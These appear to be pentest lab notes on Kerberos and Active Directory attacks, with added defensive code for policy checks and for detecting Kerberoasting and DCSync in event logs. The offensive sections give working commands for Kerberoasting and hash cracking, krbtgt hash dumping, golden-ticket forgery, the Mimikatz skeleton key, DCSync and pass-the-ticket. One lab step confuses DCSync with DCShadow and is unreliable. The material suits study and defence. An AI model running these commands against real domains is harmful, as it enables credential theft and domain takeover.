# Kerberos

## General

* 3 Heads of Kerberos:
  * Client > TrustedServer/DC > Server

## Ticket Flow

| **Ticket Flow**                   | Example                       |
| --------------------------------- | ----------------------------- |
| Request TGT >                     | Apply for Drivers License >   |
| < TGT + SessionKey                | < Granted with Hologram       |
| TGT + Request to TGS >            | Request to go to ABC Store >  |
| < ServiceTicket                   | < Approved w/ ABC Hash/Ticket |
| Auth to Service w/ServiceTicket > | Going to ABC Store >          |

## 3 Long-Term Keys

1. Client (me)
2. Target/Service key
3. KDC (from krbtgt acct)
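Added example (not from the original notes): a toy Python model of the ticket flow above, showing which of the three long-term keys seals which message. The "encryption" is a SHA-256 keystream plus an HMAC tag, a stand-in for the real Kerberos etypes; the principal names, passwords and salts are constructed.

```python
# Toy Kerberos ticket-flow model (added example, not the notes' own code).
# Encryption here is a keyed SHA-256 keystream + HMAC tag: an illustration only,
# NOT real Kerberos crypto (real tickets use AES/RC4 etypes and ASN.1 messages).
import hashlib
import hmac
import json
import os


def derive_key(password, salt):
    """Long-term key from a password (stand-in for Kerberos string-to-key)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), 10_000)


def _keystream(key, nonce, length):
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def encrypt(key, obj):
    """Toy authenticated encryption: nonce || ciphertext || HMAC-SHA256 tag."""
    plaintext = json.dumps(obj, sort_keys=True).encode()
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ct, "sha256").digest()
    return nonce + ct + tag


def decrypt(key, blob):
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, "sha256").digest()):
        raise ValueError("wrong key or tampered ticket")
    pt = bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct))))
    return json.loads(pt)


# Constructed lab secrets: the three long-term keys the notes list.
KEYS = {
    "bob": derive_key("BobsPassword!", "MYDOMbob"),                # 1. client key
    "svcsqlserver": derive_key("Summer2019", "MYDOMsvcsqlserver"), # 2. service key
    "krbtgt": derive_key("random-kdc-secret", "MYDOMkrbtgt"),      # 3. KDC key
}


def as_exchange(client):
    """AS-REQ/AS-REP: TGT sealed with the krbtgt key, session key sealed with the client key."""
    session_key = os.urandom(32).hex()
    tgt = encrypt(KEYS["krbtgt"], {"cname": client, "session_key": session_key})
    enc_part = encrypt(KEYS[client], {"session_key": session_key})
    return tgt, enc_part


def tgs_exchange(tgt, service):
    """TGS-REQ/TGS-REP: KDC opens the TGT with its own key, seals a service ticket with the service key."""
    tgt_body = decrypt(KEYS["krbtgt"], tgt)   # only the KDC can read the TGT
    ticket = {"cname": tgt_body["cname"], "sname": service, "session_key": os.urandom(32).hex()}
    return encrypt(KEYS[service], ticket)


def service_accepts(service, service_ticket):
    """The service validates the ticket with its own long-term key and learns the client name."""
    return decrypt(KEYS[service], service_ticket)["cname"]


def can_open(key, blob):
    try:
        decrypt(key, blob)
        return True
    except ValueError:
        return False


def run_flow(client, service):
    tgt, enc_part = as_exchange(client)
    session_key = decrypt(KEYS[client], enc_part)["session_key"]  # only the client can open this
    service_ticket = tgs_exchange(tgt, service)
    return {
        "client_has_session_key": len(session_key) == 64,
        "service_sees_client": service_accepts(service, service_ticket),
        "client_can_read_service_ticket": can_open(KEYS[client], service_ticket),
        "service_key_opens_ticket": can_open(KEYS[service], service_ticket),
    }
```

`run_flow("bob", "svcsqlserver")` walks the five table rows once. The last two result fields make the key-ownership point: the service ticket is opaque to the client but opens with the service account's key alone, which is why the service account's password strength and encryption type matter so much in the sections below.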

## Group Policy for TGT Encryption

* Computer Configuration > Policies > Windows Settings > Security Settings
* \> Local Policies > Security Options > "Network security: Configure encryption types allowed for Kerberos"
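Added example (not from the original notes): decoding the bitmask that this policy writes to `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Kerberos\Parameters\SupportedEncryptionTypes` (the same bits AD stores per account in `msDS-SupportedEncryptionTypes`), so a weak setting can be spotted next to a hardened one. The bit assignments are the documented ones; the two `reg query` output lines are constructed.

```python
# Decode/assess the Kerberos encryption-type bitmask (added example, not the notes' own code).
import re

ETYPE_BITS = {
    0x01: "DES_CBC_CRC",
    0x02: "DES_CBC_MD5",
    0x04: "RC4_HMAC_MD5",
    0x08: "AES128_CTS_HMAC_SHA1_96",
    0x10: "AES256_CTS_HMAC_SHA1_96",
}
WEAK_BITS = 0x01 | 0x02 | 0x04   # DES and RC4: ticket material can be guessed offline
RECOMMENDED = 0x08 | 0x10        # AES128 + AES256 only -> 0x18
OS_DEFAULT = 0x1C                # value 0 / not configured: current Windows defaults to RC4+AES128+AES256


def decode_etypes(value):
    """Names of the encryption types enabled in the bitmask."""
    names = [name for bit, name in ETYPE_BITS.items() if value & bit]
    if value & ~sum(ETYPE_BITS):          # bits above 0x10 are reserved for "future" types
        names.append("FUTURE_TYPES")
    return names


def assess_etypes(value):
    """Enabled types, the weak ones among them, and whether only AES is allowed."""
    if value == 0:
        value = OS_DEFAULT                 # "not configured" still allows RC4
    enabled = decode_etypes(value)
    weak = [name for bit, name in ETYPE_BITS.items() if value & bit & WEAK_BITS]
    return {"enabled": enabled, "weak": weak, "compliant": not weak and bool(value & RECOMMENDED)}


def parse_reg_line(line):
    """Pull the DWORD out of a 'reg query ... /v SupportedEncryptionTypes' output line."""
    m = re.search(r"SupportedEncryptionTypes\s+REG_DWORD\s+0x([0-9a-fA-F]+)", line)
    if not m:
        raise ValueError("no SupportedEncryptionTypes value in line")
    return int(m.group(1), 16)


# Constructed output lines: a host still allowing RC4 vs. one hardened to AES only.
WEAK_HOST_LINE = "    SupportedEncryptionTypes    REG_DWORD    0x1c"
HARDENED_HOST_LINE = "    SupportedEncryptionTypes    REG_DWORD    0x18"

if __name__ == "__main__":
    for line in (WEAK_HOST_LINE, HARDENED_HOST_LINE):
        print(hex(parse_reg_line(line)), assess_etypes(parse_reg_line(line)))
```

Run the same check against `msDS-SupportedEncryptionTypes` on each service account with an SPN: an account whose value still includes 0x4 (or is unset) will be issued RC4 service tickets.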

## Attack Flow

1. Find AD Accts with SPN (map between service and svc-acct)
2. Request RC4 service tickets from DC
3. Extract Service Tickets to file
4. Offline Brute Force

## Kerberoasting Targets

1. MSSQL
2. AGPMServer (for GPO)
3. FIMService (Forefront Identity)
4. STS (Security Token Service VMWare)

## Defenses

* Disable RC4 with GPO
* Use AES instead
* (Group) Managed Service Accounts - long random password that AD rotates automatically, nothing for an admin to set
* Protected Users - members' Kerberos keys and password hashes aren't cached in LSASS memory; RC4 and NTLM are refused for them
* PAC validation
* Credential Guard - LSASS secrets are isolated, so hashes and Kerberos keys can't be read out of memory
* Services like: "sqlsvc" should not be Domain Admin
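Added example (not from the original notes): a detector for the Kerberoasting pattern in Windows Security event 4769 ("A Kerberos service ticket was requested"), exported as dicts. Field names follow the 4769 event XML; the sample events, principal names, source IP and the four-services-in-five-minutes threshold are constructed for this illustration.

```python
# Kerberoasting detection over 4769 events (added example, not the notes' own code).
from collections import defaultdict
from datetime import datetime, timedelta

RC4_ETYPES = {"0x17", "0x18"}        # RC4-HMAC and RC4-HMAC-EXP ticket encryption types
BURST_THRESHOLD = 4                   # distinct service accounts requested by one principal
BURST_WINDOW = timedelta(minutes=5)   # ...within this window (constructed tuning values)


def is_roast_candidate(ev):
    """A successfully issued RC4 service ticket for a user (not machine) service account."""
    if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
        return False
    if ev.get("TicketEncryptionType", "").lower() not in RC4_ETYPES:
        return False
    svc = ev.get("ServiceName", "")
    return svc.lower() != "krbtgt" and not svc.endswith("$")


def detect_kerberoasting(events):
    """Group RC4 candidates per requester; alert on a burst of distinct services."""
    by_user = defaultdict(list)
    for ev in events:
        if is_roast_candidate(ev):
            by_user[ev["TargetUserName"]].append(ev)
    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        times = [datetime.fromisoformat(e["TimeCreated"]) for e in evs]
        for i, start in enumerate(times):
            in_window = [e for e, t in zip(evs, times) if timedelta(0) <= t - start <= BURST_WINDOW]
            services = sorted({e["ServiceName"] for e in in_window})
            if len(services) >= BURST_THRESHOLD:
                alerts.append({"user": user, "source_ip": evs[i]["IpAddress"],
                               "first_seen": evs[i]["TimeCreated"], "services": services})
                break
    return alerts


def _event(offset_s, user, service, etype, status="0x0"):
    """Constructed 4769 record; real exports carry the same field names."""
    ts = datetime(2024, 3, 1, 9, 0, 0) + timedelta(seconds=offset_s)
    return {"EventID": 4769, "TimeCreated": ts.isoformat(), "TargetUserName": user,
            "ServiceName": service, "TicketEncryptionType": etype, "Status": status,
            "IpAddress": "::ffff:10.10.10.50"}


SAMPLE_EVENTS = [
    _event(0,  "bob@MYDOM.LOCAL",   "svcsqlserver", "0x17"),
    _event(1,  "bob@MYDOM.LOCAL",   "agpmsvc",      "0x17"),
    _event(1,  "bob@MYDOM.LOCAL",   "krbtgt",       "0x17"),   # TGT-related, ignored
    _event(2,  "bob@MYDOM.LOCAL",   "fimsvc",       "0x17"),
    _event(2,  "bob@MYDOM.LOCAL",   "WS01$",        "0x17"),   # machine account, ignored
    _event(3,  "bob@MYDOM.LOCAL",   "stssvc",       "0x17"),
    _event(60, "alice@MYDOM.LOCAL", "svcsqlserver", "0x12"),   # AES256 ticket: normal use
    _event(61, "alice@MYDOM.LOCAL", "fimsvc",       "0x17", status="0x7"),  # SPN unknown, no ticket
    _event(90, "carol@MYDOM.LOCAL", "agpmsvc",      "0x17"),   # single RC4 ticket: listed, no burst
]

if __name__ == "__main__":
    for alert in detect_kerberoasting(SAMPLE_EVENTS):
        print(alert)
```

With RC4 disabled by the policy above, any remaining 0x17 ticket in 4769 is itself worth a look; the burst rule is what separates a tool enumerating every SPN from an application requesting one ticket.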

## Kerberoasting

```
Connect to pc:
PsExec64.exe -accepteula -u bob \\$IP cmd.exe
pw-prompt: xxxx
whoami   ..bob
ipconfig ..$IP

Pull SPN's
cd \tools\ke*
> cscript.exe GetUserSPNs.vbs   ...or:
> GetUserSPNs.py -request domain\bob -dc-ip $IP > spns.output
Found 'svcsqlserver' w/RC4 (bad encryption)

Request Ticket for svcsqlserver:
C:\Tools\Kerb\powershell.exe -command "Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'svcsqlserver/dc.domain.local:1433'"

Optional: Grab tickets with Mimikatz and export them to a list
cd ../mim*/x64/
mimikatz.exe
kerberos::list /export
exit

Crack the Kerb:
cd C:\Tools\Kerberoast\
python tgsrepcrack.py dictionary.txt file.kirbi
hashcat -m 13100 -a 0 spns.output /usr/local/..examp.dict

Connect:
cd c:\Tools\Sysinternals\
PsExec64.exe -accepteula -u mydom/svcsqlserver \\$IP cmd.exe
wmiexec.py mydom/svcsqlserver@10.10.10.5 whoami
pw-prompt: crackedpw
hostname .. DC
net user svcsqlserver /domain   ..part of Domain Admins, yikes!
win !!
```

* Other Method:
  * **Powerview** > Invoke-Kerberoast

## Golden Ticket

* Impacket:
  * secretsdump.py
  * wmiexec.py
  * lookupsid.py
  * ticketer.py

### Get the nthash

```
> secretsdump.py mydom/svcsqlserver@$IP -just-dc-user krbtgt

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:abcxyz123...:thenthashxyz1111:::
                          |
                        nthash
```

### Get the FQDN

```
> wmiexec.py mydom/svcsqlserver@$IP ipconfig /all

Windows IP Configuration
   Host Name . . . . . . . . . . . . : DC01
   Primary Dns Suffix  . . . . . . . : mydom
```

### Get the Domain SID

```
> lookupsid.py mydom/svcsqlserver@$IP

Password:
[*] Brute forcing SIDs at $IP
[*] StringBinding ncacn_np:$IP[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-111122222-3333334444-5555566666
```

### Create a golden ticket!

```
> ticketer.py -domain mydom -domain-sid S-1-5-21-111122222-3333334444-5555566666 -nthash thenthashxyz1111 Administrator

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for mydom/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache
```

### Abuse

* The golden ticket - DO NOT EXECUTE !!!
* After exporting the **Administrator.ccache** ticket file, point KRB5CCNAME at it..
* Any tool from the Impacket suite (wmiexec, psexec, ...) will then use it with **-k -no-pass**

```
> export KRB5CCNAME=Administrator.ccache
> wmiexec.py mydom/svcsqlserver@$IP ipconfig /all -k -no-pass
```

## Mimikatz

* Create a Golden Ticket with Mimikatz

```
mimikatz > kerberos::golden /krbtgt:e19xyz... /admin:root
/domain:mydom /sid:S-1-5-21.. /ticket:golden.ticket.bin
Creates "golden.ticket.bin"

pass-the-ticket (ptt)
mimikatz > kerberos::ptt golden.ticket.bin
```

## Skeleton Key (mimikatz)

* Adds a master password, **mimikatz**, that logs in as any domain user (real passwords keep working)
* Patches the LSA process in memory on the DC
* Requires admin rights and debug privileges
* Not persistent: a reboot of the DC clears it

```
mimikatz# privilege::debug
mimikatz# misc::skeleton
Done!
```

## DCSync (mimikatz)

* Pulls the account secrets held in "ntds.dit" by asking the DC to replicate them (DRSUAPI), no file access needed
* REF: [NTDS](https://pentest.mxhx.org/07-win-privesc/ntds)

```
m> lsadump::dcsync /user:administrator
```
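Added example (not from the original notes): flagging DCSync-style replication requests in Windows Security event 4662 ("An operation was performed on an object"). A DCSync shows up as a control-access operation carrying the DS-Replication-Get-Changes rights from a principal that is not a domain controller. The right GUIDs are the documented AD ones; the events, account names and DC list are constructed.

```python
# DCSync detection over 4662 events (added example, not the notes' own code).
import re

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = "0x100"                           # 4662 AccessMask for a control access right
GUID_RE = re.compile(r"\{?([0-9a-fA-F-]{36})\}?")  # 4662 lists property GUIDs in braces


def replication_rights_used(properties):
    """Names of the replication rights present in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(events, dc_accounts):
    """4662 control-access operations with replication rights from a non-DC subject."""
    known_dcs = {a.upper() for a in dc_accounts}
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("AccessMask") != CONTROL_ACCESS:
            continue
        rights = replication_rights_used(ev.get("Properties", ""))
        if not rights:
            continue
        subject = ev["SubjectUserName"]
        if subject.upper() in known_dcs:
            continue                                # DC-to-DC replication is normal
        hits.append({"subject": subject, "domain": ev["SubjectDomainName"],
                     "rights": rights, "object": ev["ObjectName"]})
    return hits


# Constructed 4662 records (field names follow the event XML).
DOMAIN_OBJECT = "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"   # domainDNS class GUID
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "MYDOM",
     "AccessMask": "0x100", "ObjectName": "DC=mydom,DC=local",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} " + DOMAIN_OBJECT},      # real DC
    {"EventID": 4662, "SubjectUserName": "svcsqlserver", "SubjectDomainName": "MYDOM",
     "AccessMask": "0x100", "ObjectName": "DC=mydom,DC=local",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} " + DOMAIN_OBJECT},      # not a DC
    {"EventID": 4662, "SubjectUserName": "alice", "SubjectDomainName": "MYDOM",
     "AccessMask": "0x100", "ObjectName": "CN=bob,CN=Users,DC=mydom,DC=local",
     "Properties": "{00299570-246d-11d0-a768-00aa006e0529}"},   # User-Force-Change-Password, unrelated
]

if __name__ == "__main__":
    for hit in detect_dcsync(SAMPLE_EVENTS, ["DC01$", "DC02$"]):
        print(hit)
```

This needs "Audit Directory Service Access" enabled and a SACL on the domain object for the replication rights, otherwise 4662 is never written for them; the DC list should come from the Domain Controllers OU, not be hard-coded as here.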

## DCShadow

* Similar to DCSync
* Register myself as a DC
* Pushes changes through normal AD replication, so it leaves almost no logging

## Mimikatz GT Lab

```
-----------------
Start
cd \Tools\SysInternalsSuite\
PsExec64.exe -accepteula -u mydomain\svcsqlserver \\$IP cmd.exe
c:\Windows\System32  ..now on $IP!!
whoami /user  ..get the sid

-----------------
Imposter:
cd \tools\m*\x64
> mimikatz.exe
m> lsadump::dcsync /user:fakedc
.. i'm a dc named 'fakedc'
.. Creds: we got the ntlm hash

-----------------
Ticket:
m> kerberos::golden /rc4:xyzhash /user:administrator /domain:mydomain /sid:xyzsid
Created: "ticket.kirbi"

-----------------
Pass-the-ticket
\\10.10.10.10\c$ ..copy the ticket
cd \tools\m*\x64
> mimikatz.exe
kerberos::ptt c:\Users\me\Desktop\ticket.kirbi
exit
klist  ..shows the tickets

-----------------
Exploit:
From 10.10.10.10
PsExec64.exe -accepteula \\dc01 cmd.exe   ..will use the ticket for auth!
```
